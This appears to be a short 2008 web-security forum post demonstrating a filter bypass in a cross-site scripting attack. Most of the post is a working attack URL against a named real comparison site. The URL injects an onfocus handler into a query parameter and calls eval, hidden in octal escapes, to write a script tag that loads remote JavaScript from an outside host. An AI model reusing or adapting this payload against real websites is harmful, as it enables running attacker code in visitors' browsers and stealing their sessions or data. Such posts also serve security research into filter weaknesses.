remove all spaces and replace all e by m which avoids Eval, iframE, String.fromCharCode, etc. etc.
Is this save? You all know ...
Quote
http://verivox.de/Power/Calculator.asp?31=on&No=40&51=on&52=on&54=on&lookup=true&leistungsmessung=no&radio1=1&plz=01234&11=31337%22onfocus=%22top['\145\166\141\154']('\144\157\143\165\155\145\156\164\56\167\162\151\164\145\154\156\50\47\74\142\157\144\171\76\74\163\143\162\151\160\164\40\163\162\143\75\42\57\57\150\141\56\143\153\145\162\163\56\157\162\147\57\163\42\76\74\57\163\143\162\151\160\164\76\74\57\142\157\144\171\76\47\51\73');&customer=priv&submit1=vergleichen
(uses onfocus)
Lesson learned: forget about any sanitation;-)
--
Edit: ubb's url tag is too stupid for sophisticated links:-/
Edited 1 time(s). Last edit at 02/01/2008 04:26AM by kirke.